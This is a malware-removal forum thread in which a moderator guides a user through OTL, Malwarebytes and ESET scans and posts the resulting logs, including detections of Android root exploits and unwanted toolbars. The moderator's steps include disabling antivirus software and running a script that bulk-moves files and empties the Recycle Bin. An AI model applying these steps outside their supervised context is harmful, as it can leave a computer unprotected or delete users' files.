Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{44990B00-3C9D-426D-81DF-AAB636FA4345}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{44990B00-3C9D-426D-81DF-AAB636FA4345}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{44990B00-3C9D-426D-81DF-AAB636FA4345}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{44990B00-3C9D-426D-81DF-AAB636FA4345}\ not found.
Starting removal of ActiveX control {8FFBE65D-2C9C-4669-84BD-5829DC0B603C}
C:\Windows\Downloaded Program Files\erma.inf moved successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{8FFBE65D-2C9C-4669-84BD-5829DC0B603C}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FFBE65D-2C9C-4669-84BD-5829DC0B603C}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8FFBE65D-2C9C-4669-84BD-5829DC0B603C}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8FFBE65D-2C9C-4669-84BD-5829DC0B603C}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0364bdc2-a25d-11df-a13c-001c2528d4ad}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0364bdc2-a25d-11df-a13c-001c2528d4ad}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0364bdc2-a25d-11df-a13c-001c2528d4ad}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0364bdc2-a25d-11df-a13c-001c2528d4ad}\ not found.
File M:\LaunchU3.exe -a not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{be0ba5ee-65d0-11e0-a473-00080e7997e3}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{be0ba5ee-65d0-11e0-a473-00080e7997e3}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{be0ba5ee-65d0-11e0-a473-00080e7997e3}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{be0ba5ee-65d0-11e0-a473-00080e7997e3}\ not found.
File J:\CTRun\Start.EXE not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fa47b680-5eb2-11e0-9cf4-001c2528d4ad}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fa47b680-5eb2-11e0-9cf4-001c2528d4ad}\ not found.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fa47b680-5eb2-11e0-9cf4-001c2528d4ad}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fa47b680-5eb2-11e0-9cf4-001c2528d4ad}\ not found.
File K:\LaunchU3.exe -a not found.
C:\ProgramData\xml3F22.tmp deleted successfully.
C:\ProgramData\xml4D46.tmp deleted successfully.
C:\ProgramData\xml4EDC.tmp deleted successfully.
ADS C:\ProgramData\TEMP:5C321E34 deleted successfully.
========== REGISTRY ==========
Registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\\{7B63B2922B174135AFC0E1377DD81EC2} not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7B63B2922B174135AFC0E1377DD81EC2}\ not found.
========== COMMANDS ==========
 
[EMPTYTEMP]
 
User: All Users
 
User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33170 bytes
 
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
User: Ken
->Temp folder emptied: 35074040 bytes
->Temporary Internet Files folder emptied: 175408690 bytes
->Java cache emptied: 305628 bytes
->FireFox cache emptied: 60085305 bytes
->Google Chrome cache emptied: 370225724 bytes
->Flash cache emptied: 2366 bytes
 
User: Public
 
User: UpdatusUser
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33170 bytes
 
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 5925063 bytes
%systemroot%\system32\config\systemprofile\Local Settings\Temp folder emptied: 0 bytes
%systemroot%\system32\config\systemprofile\Local Settings\Temporary Internet Files folder emptied: 0 bytes
RecycleBin emptied: 284481685 bytes
 
Total Files Cleaned = 888.00 mb
 
C:\Windows\System32\drivers\etc\Hosts moved successfully.
HOSTS file reset successfully
 
OTL by OldTimer - Version 3.2.69.0 log created on 05212014_092905

Files\Folders moved on Reboot...

PendingFileRenameOperations files...

Registry entries deleted on Reboot...
 


  • 0

#9
Kenjesse
Posted 21 May 2014 - 08:50 AM

Kenjesse

    Member

  • Topic Starter
  • Member
  • PipPip
  • 88 posts

Am getting two "Windows cannnot open this file:" messages during bootup

 

File: Empowering Technology Launcher.Ink.disabled  (not sure what it is I'm thinking Acer related and not needed)

 

File: APC UPS Status.Ink.disabled (related to an APC UPS I not currently using as the battery needs to be replaced and is not connected to system)

 

Otherwise am having no further problems with any browser, looking good to me at this point.


  • 0

#10
Valinorum
Posted 21 May 2014 - 08:53 AM

Valinorum

    GeekU Guardian Bot

  • GeekU Moderator
  • 3,330 posts
Hi Kenjesse, :)
  • Step #5 Scan with Malwarebytes' Anti-Malware
    • Download Malwarebytes' Anti-Malware from the suitable link below --
    • Double-click mbam-setup.exe to install the application.
    • Before clicking Finish perform the following actions --
      • Un-check the box beside Enable free trial of Malwarebytes Anti-Malware Premium.
      • Check the box beside Launch Malwarebytes Anti-Malware
    • Once the program has loaded, The MBAM dashboard will appear with an alert to update - click the green button Update Now;
    • Click on Setting--
      • Navigate to the tab Detection and Protection and check all the boxes under Detection Options
    • From the Dashboard click on Scan Now;
    • If threats are detected click on Apply actions. If the program asks to reboot your PC, let it do so;
    • On completion of the scan click on View Detailed Log after that click on Export Button, select Text File and save the log to your Desktop;
    • Copy and Paste the contents of the log in your next reply.
 
  • Step #6 ESET Online Scanner
    Disable your security programs which includes but not limited to anti-virus, anti-malware, anti-spyware et cetera. Peruse this for additional information.
    • Download esetsmartinstaller_enu.exe by clicking here.
    • Right-click on the program and choose Run as administrator.
    • Accept their terms and condition and proceed.
    • Install Add-On/Active X if prompted.
    • From the Computer Scan Setting --
      • Uncheck the box beside Remove Found Threats;
      • Check the box beside Scan archives
    • Click on Advanced Setting and check the following boxes--
      • Scan for potentially unwanted applications
      • Scan for potentially unsafe applications
      • Enable Anti-Stealth Technology
    • Click on Start and wait for the virus signature database to update.
    • The online scan will begin automatically and can take several hours.
      • Note: Do not touch either the Mouse or keyboard during the scan. Otherwise it may stall.
    • After the Scan finishes --
      • If no threats were found:
        • Put a checkmark in Uninstall application on close.
        • Close the program and report that nothing was found
      • If threats were found:
        • Open the file located in C:\Program Files\ESET\ESET Online Scanner\log.txt (32-bit) or C:\Program Files (x86)\ESET\ESET Online Scanner\log.txt (64-bit).
        • Copy and Paste contents of the log file in your next reply.
    Note: Enable your security programs afterwards.
 
  • Required Log(s):
    • Malwarebytes' Anti-Malware Log;
    • ESET Scan Log
Regards,
Valinorum
  • 0

Advertisements

#11
Kenjesse
Posted 21 May 2014 - 04:11 PM

Kenjesse

    Member

  • Topic Starter
  • Member
  • PipPip
  • 88 posts

More logs follow:

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 5/21/2014
Scan Time: 1:16:56 PM
Logfile: MBAMLog.txt
Administrator: Yes

Version: 2.00.2.1012
Malware Database: v2014.05.21.07
Rootkit Database: v2014.03.27.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows Vista Service Pack 2
CPU: x86
File System: NTFS
User: Ken

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 277867
Time Elapsed: 13 min, 57 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 4
PUP.Optional.ShoppingGate.A, C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_inst.shoppingate.info_0.localstorage, Quarantined, [9d637789e51b45bbfd8f7e0a90725fa1],
PUP.Optional.ShoppingGate.A, C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_inst.shoppingate.info_0.localstorage-journal, Quarantined, [e31ddb25ce32b54b820ab3d54db5f20e],
PUP.Optional.Superfish.A, C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_www.superfish.com_0.localstorage, Quarantined, [04fc16eabf4113ed2ac4e0a88d753cc4],
PUP.Optional.Superfish.A, C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_www.superfish.com_0.localstorage-journal, Quarantined, [48b88c7406fa827e0be30187689a6b95],

Physical Sectors: 0
(No malicious items detected)


(end)

 

ESETSmartInstaller@High as downloader log:
all ok
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.6920
# api_version=3.0.2
# EOSSerial=0f2a595cec75654390d8b43b971a7495
# engine=18354
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2014-05-21 09:56:48
# local_time=2014-05-21 05:56:48 (-0500, Eastern Daylight Time)
# country="United States"
# lang=1033
# osver=6.0.6002 NT Service Pack 2
# compatibility_mode=5892 16776574 100 100 118722659 237316936 0 0
# scanned=290789
# found=38
# cleaned=0
# scan_time=15414
sh=77801D0E0DC02E8C50CDC73562F4D7F13FC1C18B ft=0 fh=0000000000000000 vn="Win32/Conduit.SearchProtect.A potentially unwanted application" ac=I fn="C:\AdwCleaner\Quarantine\C\Program Files\SearchProtect\ffprotect\application.js.vir"
sh=A696C5A0D50145AFDE3D3A71F70B1C3006AC2199 ft=1 fh=da0003b6601dbc17 vn="a variant of Win32/Adware.MultiPlug.I application" ac=I fn="C:\AdwCleaner\Quarantine\C\ProgramData\Vaudix\510db82b7b061.dll.vir"
sh=F7A7398712BC2E31AF290FB2422486B28E6FD181 ft=0 fh=0000000000000000 vn="Win32/Adware.MultiPlug.H application" ac=I fn="C:\AdwCleaner\Quarantine\C\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Extensions\knfhfghnfdabbalddnnbdjmjomfgjbog\1\510db82b7ae502.52047167.js.vir"
sh=93510E07EBD463BE51052EC8114EC16C5423103E ft=0 fh=0000000000000000 vn="Win32/Conduit.SearchProtect.A potentially unwanted application" ac=I fn="C:\Program Files\Mozilla Firefox\components\sprotector.js"
sh=294742C59CFB3FAAE38D3CE6B9C75BE062AFAA66 ft=1 fh=9215b8a5782cc616 vn="a variant of Win32/InstallBrain.AW potentially unwanted application" ac=I fn="C:\Program Files\Uninstall Information\ib_uninst_391\uninstall.exe"
sh=505071B8AC2036536C8A52D5AE43FC6EB2915CAA ft=0 fh=0000000000000000 vn="Android/Exploit.Lotoor.AN trojan" ac=I fn="C:\Users\Ken\Downloads\DooMLoRD_v4_ROOT-zergRush-busybox-su.zip"
sh=13DDFA1862B74BDBBC06FC8766B36B9B73B25760 ft=1 fh=891ef6f01345cc13 vn="a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application" ac=I fn="C:\Users\Ken\Downloads\SetupImgBurn_2.5.7.0.exe"
sh=2483ED987A0C85B80495BB0082BC33B03F76D64F ft=0 fh=0000000000000000 vn="Android/Exploit.Lotoor.AN trojan" ac=I fn="C:\Users\Ken\Downloads\DooMLoRD_v4_ROOT-zergRush-busybox-su\files\zergRush"
sh=DFA332BA2B8A9CFD5488D752EF730E411C2861F2 ft=0 fh=0000000000000000 vn="Android/Exploit.Lotoor.AH trojan" ac=I fn="C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\eu.chainfire.gingerbreak-20111223-200017.tar (deleted 4ded4bf2011bf57b900426342dfa7cf9).gz"
sh=5A3E7AD20CC93238EA0E5EFF8889F31618704BB2 ft=0 fh=0000000000000000 vn="multiple threats" ac=I fn="C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\eu.chainfire.gingerbreak-a124c285169bdaf536c14cc91b7d6c81.apk (deleted 19d97b60c3a218db99e15d266d1cb35e).gz"
sh=FC757C651470BF5F4D333C0C36008080F8A00B10 ft=0 fh=0000000000000000 vn="Android/WifiKill.A potentially unsafe application" ac=I fn="C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\net.ponury.wifikill-20111223-195847.tar (deleted ed3f4ac3bf22b3eeb2da33d4dd41788d).gz"
sh=03EA704933408DBCEF43FFB1756D4016EAB352FC ft=0 fh=0000000000000000 vn="Android/WifiKill.A potentially unsafe application" ac=I fn="C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\net.ponury.wifikill-9456cadbe31b8d33ab3e024ae7f86318.apk (deleted 8ea0f0aeaac4d1496b1dc74b6a75dc29).gz"
sh=13EE8C9FCE6F74512DCD188CCA0655C5EDE37612 ft=1 fh=756c61b76c471ca8 vn="MSIL/HackKMS.A potentially unsafe application" ac=I fn="C:\Windows\AutoKMS\AutoKMS.exe"
sh=4A1A1AB54A25B55C5ABDF3F3F89C31475BE30D98 ft=1 fh=5616fe98454d279a vn="Win32/OpenCandy potentially unsafe application" ac=I fn="D:\My Documents\Downloads\avc-free.exe"
sh=6EB1CB1D94A00DAF1FB91218B050FDCBA8436C03 ft=1 fh=4ee2e677a5bceddb vn="Win32/Joke.ScreenMate potentially unsafe application" ac=I fn="D:\My Documents\Downloads\funstuff\FELIX.EXE"
sh=FFB70E6A14EF730C3DD80BAABAA14B1B453DD2A0 ft=1 fh=66719f253af405bf vn="Win32/Joke.ScreenMate.AA potentially unsafe application" ac=I fn="D:\My Documents\Downloads\funstuff\hotstuff.exe"
sh=68D0D2B3521A6F7DCFCF09811723F1E23F29554E ft=1 fh=ccae1559ce4c6262 vn="a variant of Win32/Joke.ScreenMate.AA potentially unsafe application" ac=I fn="D:\My Documents\Downloads\funstuff\trickor.exe"
sh=DFA332BA2B8A9CFD5488D752EF730E411C2861F2 ft=0 fh=0000000000000000 vn="Android/Exploit.Lotoor.AH trojan" ac=I fn="D:\My Documents\Dropbox\.dropbox.cache\2014-05-20\eu.chainfire.gingerbreak-20111223-200017.tar (deleted a37824c40aafea52b71bbe1ecd9d005b).gz"
sh=5A3E7AD20CC93238EA0E5EFF8889F31618704BB2 ft=0 fh=0000000000000000 vn="multiple threats" ac=I fn="D:\My Documents\Dropbox\.dropbox.cache\2014-05-20\eu.chainfire.gingerbreak-a124c285169bdaf536c14cc91b7d6c81.apk (deleted 63716b32f61cefe9bb51b5c68d259828).gz"
sh=FC757C651470BF5F4D333C0C36008080F8A00B10 ft=0 fh=0000000000000000 vn="Android/WifiKill.A potentially unsafe application" ac=I fn="D:\My Documents\Dropbox\.dropbox.cache\2014-05-20\net.ponury.wifikill-20111223-195847.tar (deleted 9b49b6c93594375b46b99d7d591461e7).gz"
sh=03EA704933408DBCEF43FFB1756D4016EAB352FC ft=0 fh=0000000000000000 vn="Android/WifiKill.A potentially unsafe application" ac=I fn="D:\My Documents\Dropbox\.dropbox.cache\2014-05-20\net.ponury.wifikill-9456cadbe31b8d33ab3e024ae7f86318.apk (deleted fd916518603b8e4ae9b2b581e57e747a).gz"
sh=93C1870062696A598F683D35947A900693686042 ft=1 fh=14e5eb4356bf1e0f vn="a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application" ac=I fn="D:\My Documents\Programs\frostwire-5.2.3.windows.exe"
sh=6F060E73AC758019A64CFA9A9D6823A339F74E61 ft=1 fh=432e79709b596bc0 vn="a variant of Win32/Toolbar.Babylon.C potentially unwanted application" ac=I fn="D:\My Documents\Programs\PuranDefragFreeSetup.exe"
sh=3A89DAEE2C931D0AAA7B102D3DA9D2174DC5875E ft=1 fh=d16f3ccb0b0b7a97 vn="a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application" ac=I fn="D:\My Documents\Programs\SetupImgBurn_2.5.5.0.exe"
sh=A8A37E54DB53B64808D4DE3DDBB505859E9F4269 ft=1 fh=b799c6fdeb2be9bc vn="Win32/Bundled.Toolbar.Google.E potentially unsafe application" ac=I fn="D:\My Documents\Programs\Computer Tools\ccsetup311.exe"
sh=FC4EB4C4C435E5994B76666E68C928F5E54CE727 ft=1 fh=0cbb88057912f97d vn="Win32/OpenCandy potentially unsafe application" ac=I fn="D:\My Documents\Programs\Computer Tools\KeyFinderInstaller.exe"
sh=2D3AFEAA5C748F4F51BD6DE9F1E2A251381986A0 ft=1 fh=f659b58f9529ba18 vn="Win32/OpenCandy potentially unsafe application" ac=I fn="F:\Documents and Settings\Ken\.frostwire5\updates\frostwire-5.5.5.windows.exe"
sh=49ACAFACAAC62A745E69D71A58CC9453C41B15D0 ft=1 fh=b98f31ba52914450 vn="a variant of Win32/Toolbar.Conduit.I potentially unwanted application" ac=I fn="F:\Documents and Settings\Ken\Desktop\UBCD4WinV360.exe"
sh=2D3AFEAA5C748F4F51BD6DE9F1E2A251381986A0 ft=1 fh=f659b58f9529ba18 vn="Win32/OpenCandy potentially unsafe application" ac=I fn="F:\Program Files\FrostWire 5\frostwire-installer.exe"
sh=533EBEE5E8DB5053E1F062B23F74DC1C72B153CE ft=1 fh=4a9334026ea419e3 vn="Win32/OpenCandy potentially unsafe application" ac=I fn="F:\Program Files\FrostWire 5\OCSetupHlp.dll"
sh=FE0F99F8076E78035273E1DEA5C3B8A8763ED908 ft=0 fh=0000000000000000 vn="a variant of Win32/Toolbar.Conduit.I potentially unwanted application" ac=I fn="F:\UBCD4Win\UBCD4WinBuilder.iso"
sh=4B9B1607C28352F8FDE107E2E08AF260F0237A96 ft=1 fh=f338f095141cac61 vn="a variant of Win32/Toolbar.Conduit.I potentially unwanted application" ac=I fn="F:\UBCD4Win\BartPE\PROGRAMS\ExpressBurn\expressburn.exe"
sh=6661EDA8383915E3713D78F0189D1A15EB5D80C7 ft=1 fh=cd240aea2e807323 vn="Win32/PrcView potentially unsafe application" ac=I fn="F:\UBCD4Win\BartPE\PROGRAMS\sdfix\SDFix.exe"
sh=EC70E13DB30A165A8CC77485C719BA0CD4A43CC3 ft=0 fh=0000000000000000 vn="a variant of Win32/RemoteAdmin.RemoteExec.AA potentially unsafe application" ac=I fn="F:\UBCD4Win\BartPE\PROGRAMS\SysInfo\sysinfo.7z"
sh=4B9B1607C28352F8FDE107E2E08AF260F0237A96 ft=1 fh=f338f095141cac61 vn="a variant of Win32/Toolbar.Conduit.I potentially unwanted application" ac=I fn="F:\UBCD4Win\plugin\CDBurning\ExpressBurn\expressburn.exe"
sh=6661EDA8383915E3713D78F0189D1A15EB5D80C7 ft=1 fh=cd240aea2e807323 vn="Win32/PrcView potentially unsafe application" ac=I fn="F:\UBCD4Win\plugin\Cleanup Tools\SDFix\SDFix.exe"
sh=EC70E13DB30A165A8CC77485C719BA0CD4A43CC3 ft=0 fh=0000000000000000 vn="a variant of Win32/RemoteAdmin.RemoteExec.AA potentially unsafe application" ac=I fn="F:\UBCD4Win\plugin\System-Info\Information\SysInfo\sysinfo.7z"
sh=890368473ECBC404DCD42FF0C6C38397102F59C0 ft=1 fh=4c7db45bf4256cb3 vn="Win32/PrcView potentially unsafe application" ac=I fn="F:\WINDOWS\system32\Process.exe"
 


  • 0

#12
Valinorum
Posted 21 May 2014 - 09:51 PM

Valinorum

    GeekU Guardian Bot

  • GeekU Moderator
  • 3,330 posts
Hi Kenjesse, :)

Let's remove the remnants. What issues are you facing currently?
  • Step #7 Fix with OTL
    • Re-run OTL by right clicking and choosing Run as administrator;
    • Under the Custom Scans/Fixes Box copy and paste the following contents inside the quote box. (Do not include the word 'quote').

      :Commands
      [createrestorepoint]

      :Files
      C:\Program Files\Mozilla Firefox\components\sprotector.js
      C:\Program Files\Uninstall Information\ib_uninst_391\uninstall.exe
      C:\Users\Ken\Downloads\DooMLoRD_v4_ROOT-zergRush-busybox-su.zip
      C:\Users\Ken\Downloads\SetupImgBurn_2.5.7.0.exe
      C:\Users\Ken\Downloads\DooMLoRD_v4_ROOT-zergRush-busybox-su\files\zergRush
      C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\eu.chainfire.gingerbreak-20111223-200017.tar (deleted 4ded4bf2011bf57b900426342dfa7cf9).gz
      C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\eu.chainfire.gingerbreak-a124c285169bdaf536c14cc91b7d6c81.apk (deleted 19d97b60c3a218db99e15d266d1cb35e).gz
      C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\net.ponury.wifikill-20111223-195847.tar (deleted ed3f4ac3bf22b3eeb2da33d4dd41788d).gz
      C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\net.ponury.wifikill-9456cadbe31b8d33ab3e024ae7f86318.apk (deleted 8ea0f0aeaac4d1496b1dc74b6a75dc29).gz
      C:\Windows\AutoKMS\AutoKMS.exe
      D:\My Documents\Downloads\avc-free.exe
      D:\My Documents\Downloads\funstuff\FELIX.EXE
      D:\My Documents\Downloads\funstuff\hotstuff.exe
      D:\My Documents\Downloads\funstuff\trickor.exe
      D:\My Documents\Dropbox\.dropbox.cache\2014-05-20\eu.chainfire.gingerbreak-20111223-200017.tar (deleted a37824c40aafea52b71bbe1ecd9d005b).gz
      D:\My Documents\Dropbox\.dropbox.cache\2014-05-20\eu.chainfire.gingerbreak-a124c285169bdaf536c14cc91b7d6c81.apk (deleted 63716b32f61cefe9bb51b5c68d259828).gz
      D:\My Documents\Dropbox\.dropbox.cache\2014-05-20\net.ponury.wifikill-20111223-195847.tar (deleted 9b49b6c93594375b46b99d7d591461e7).gz
      D:\My Documents\Dropbox\.dropbox.cache\2014-05-20\net.ponury.wifikill-9456cadbe31b8d33ab3e024ae7f86318.apk (deleted fd916518603b8e4ae9b2b581e57e747a).gz
      D:\My Documents\Programs\frostwire-5.2.3.windows.exe
      D:\My Documents\Programs\PuranDefragFreeSetup.exe
      D:\My Documents\Programs\SetupImgBurn_2.5.5.0.exe
      D:\My Documents\Programs\Computer Tools\ccsetup311.exe
      D:\My Documents\Programs\Computer Tools\KeyFinderInstaller.exe
      F:\Documents and Settings\Ken\.frostwire5
      F:\Documents and Settings\Ken\Desktop\UBCD4WinV360.exe
      F:\Program Files\FrostWire 5
      F:\UBCD4Win\UBCD4WinBuilder.iso
      F:\UBCD4Win\BartPE\PROGRAMS\ExpressBurn\expressburn.exe
      F:\UBCD4Win\BartPE\PROGRAMS\sdfix\SDFix.exe
      F:\UBCD4Win\BartPE\PROGRAMS\SysInfo\sysinfo.7z
      F:\UBCD4Win\plugin\CDBurning\ExpressBurn\expressburn.exe
      F:\UBCD4Win\plugin\Cleanup Tools\SDFix\SDFix.exe
      F:\UBCD4Win\plugin\System-Info\Information\SysInfo\sysinfo.7z
      F:\WINDOWS\system32\Process.exe

      :Commands
      [emptytemp]

    • Click on "Run Fix" and let the program run unhindered;
    • Your PC will reboot automatically and a log will be opened;
    • Please post it in your next reply.
 
  • Required Log(s):
    • OTL Fix Log
Regards,
Valinorum
  • 0

#13
Kenjesse
Posted 22 May 2014 - 03:08 AM

Kenjesse

    Member

  • Topic Starter
  • Member
  • PipPip
  • 88 posts

Still getting the Windows cannot open file errors mentioned in post 9, otherwise all seems well.  Latest log:

 

All processes killed
========== COMMANDS ==========
Restore point Set: OTL Restore Point
========== FILES ==========
C:\Program Files\Mozilla Firefox\components\sprotector.js moved successfully.
C:\Program Files\Uninstall Information\ib_uninst_391\uninstall.exe moved successfully.
C:\Users\Ken\Downloads\DooMLoRD_v4_ROOT-zergRush-busybox-su.zip moved successfully.
C:\Users\Ken\Downloads\SetupImgBurn_2.5.7.0.exe moved successfully.
C:\Users\Ken\Downloads\DooMLoRD_v4_ROOT-zergRush-busybox-su\files\zergRush moved successfully.
File\Folder C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\eu.chainfire.gingerbreak-20111223-200017.tar (deleted 4ded4bf2011bf57b900426342dfa7cf9).gz not found.
File\Folder C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\eu.chainfire.gingerbreak-a124c285169bdaf536c14cc91b7d6c81.apk (deleted 19d97b60c3a218db99e15d266d1cb35e).gz not found.
File\Folder C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\net.ponury.wifikill-20111223-195847.tar (deleted ed3f4ac3bf22b3eeb2da33d4dd41788d).gz not found.
File\Folder C:\Users\Ken\Dropbox\.dropbox.cache\2014-05-19\net.ponury.wifikill-9456cadbe31b8d33ab3e024ae7f86318.apk (deleted 8ea0f0aeaac4d1496b1dc74b6a75dc29).gz not found.
C:\Windows\AutoKMS\AutoKMS.exe moved successfully.
D:\My Documents\Downloads\avc-free.exe moved successfully.
D:\My Documents\Downloads\funstuff\FELIX.EXE moved successfully.
D:\My Documents\Downloads\funstuff\hotstuff.exe moved successfully.
D:\My Documents\Downloads\funstuff\trickor.exe moved successfully.
D:\My Documents\Dropbox\.dropbox.cache\2014-05-20\eu.chainfire.gingerbreak-20111223-200017.tar (deleted a37824c40aafea52b71bbe1ecd9d005b).gz moved successfully.
D:\My Documents\Dropbox\.dropbox.cache\2014-05-20\eu.chainfire.gingerbreak-a124c285169bdaf536c14cc91b7d6c81.apk (deleted 63716b32f61cefe9bb51b5c68d259828).gz moved successfully.
D:\My Documents\Dropbox\.dropbox.cache\2014-05-20\net.ponury.wifikill-20111223-195847.tar (deleted 9b49b6c93594375b46b99d7d591461e7).gz moved successfully.
D:\My Documents\Dropbox\.dropbox.cache\2014-05-20\net.ponury.wifikill-9456cadbe31b8d33ab3e024ae7f86318.apk (deleted fd916518603b8e4ae9b2b581e57e747a).gz moved successfully.
D:\My Documents\Programs\frostwire-5.2.3.windows.exe moved successfully.
D:\My Documents\Programs\PuranDefragFreeSetup.exe moved successfully.
D:\My Documents\Programs\SetupImgBurn_2.5.5.0.exe moved successfully.
D:\My Documents\Programs\Computer Tools\ccsetup311.exe moved successfully.
D:\My Documents\Programs\Computer Tools\KeyFinderInstaller.exe moved successfully.
F:\Documents and Settings\Ken\.frostwire5\updates folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\themes folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\search_db folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\library_db\library_db folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\library_db folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\jd_home folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\static.frostwire.com\images\overlays\shop folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\static.frostwire.com\images\overlays folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\static.frostwire.com\images folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\static.frostwire.com folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm6.static.flickr.com\5128 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm6.static.flickr.com\5047 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm6.static.flickr.com folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm5.static.flickr.com\4147 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm5.static.flickr.com\4089 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm5.static.flickr.com\4084 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm5.static.flickr.com\4055 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm5.static.flickr.com\4047 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm5.static.flickr.com\4028 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm5.static.flickr.com folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm2.static.flickr.com\1218 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm2.static.flickr.com\1207 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache\farm2.static.flickr.com folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\image_cache folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\dbs\sharefiles.1 folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\dbs folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\azureus\tmp folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\azureus\plugins folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\azureus\net folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\azureus\logs folder moved successfully.
F:\Documents and Settings\Ken\.frostwire5\azureus\dht folder moved successfully.
